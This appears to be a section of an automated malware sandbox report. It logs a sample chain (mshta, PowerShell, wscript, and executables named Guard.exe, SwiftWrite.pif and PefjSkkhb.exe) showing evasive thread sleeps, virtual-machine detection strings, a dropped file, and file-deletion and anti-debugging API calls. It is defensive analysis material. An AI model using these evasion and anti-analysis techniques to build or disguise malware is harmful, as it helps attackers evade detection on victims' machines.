Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1650Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1660Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6558Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3213Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4656
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1428
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4686
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4539
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ghep1[1]Jump to dropped file
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Guard.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeAPI coverage: 3.8 %
Source: C:\Users\Public\Guard.exeAPI coverage: 4.7 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1260Thread sleep count: 1650 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2908Thread sleep count: 1660 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 932Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2180Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6856Thread sleep time: -16602069666338586s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 824Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3368Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5024Thread sleep count: 4686 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5928Thread sleep count: 4539 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00007FF79F8EC7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00007FF79F8EBC70
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8EB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00007FF79F8EB7C0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00007FF79F8F72A8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F71F4 FindFirstFileW,FindClose,10_2_00007FF79F8F71F4
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8B2F50 FindFirstFileExW,10_2_00007FF79F8B2F50
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00007FF79F8FA874
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,10_2_00007FF79F8FA4F8
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8F6428 FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF79F8F6428
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8FA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,10_2_00007FF79F8FA350
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F14005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00F14005
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1494A GetFileAttributesW,FindFirstFileW,FindClose,20_2_00F1494A
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_00F1C2FF
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,20_2_00F1CD9F
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1CD14 FindFirstFileW,FindClose,20_2_00F1CD14
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00F1F5D8
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_00F1F735
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F1FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,20_2_00F1FA36
Source: C:\Users\Public\Guard.exeCode function: 20_2_00F13CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_00F13CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_00A24005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2494A GetFileAttributesW,FindFirstFileW,FindClose,24_2_00A2494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_00A2C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,24_2_00A2CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2CD14 FindFirstFileW,FindClose,24_2_00A2CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_00A2F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,24_2_00A2F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,24_2_00A2FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 24_2_00A23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,24_2_00A23CE2
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F891D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_00007FF79F891D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000012.00000002.2225326602.000002DAE8954000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: powershell.exe, 00000005.00000002.1941084329.000001DB651F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Connec
Source: wscript.exe, 00000017.00000003.2144768150.000002AD9927F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 00000003.00000003.1965170677.000002B37DB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB0C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB0D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966235459.000002B37DB13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: svchost.exe, 00000004.00000002.2935442187.000001CA4002B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
Source: powershell.exe, 00000005.00000002.1940018341.000001DB64F2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll, th""B
Source: mshta.exe, 00000003.00000002.1966235459.000002B37DB43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1957335691.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1956177042.000002B37DB43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1948749602.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.1966416203.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1965170677.000002B37DB43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1947805084.000002B37DB95000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2938716293.000001CA45855000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: powershell.exe, 00000012.00000002.2225326602.000002DAE8935000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000014.00000002.2939514467.0000000003FD7000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 00000018.00000002.2939564124.00000000043B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F900A00 BlockInput,10_2_00007FF79F900A00
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8737B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_00007FF79F8737B0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F895BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,10_2_00007FF79F895BC0
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F907634 LoadLibraryA,GetProcAddress,10_2_00007FF79F907634
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8DD868 WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,10_2_00007FF79F8DD868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\PefjSkkhb.exeCode function: 10_2_00007FF79F8959C8 SetUnhandledExceptionFilter,10_2_00007FF79F8959C8
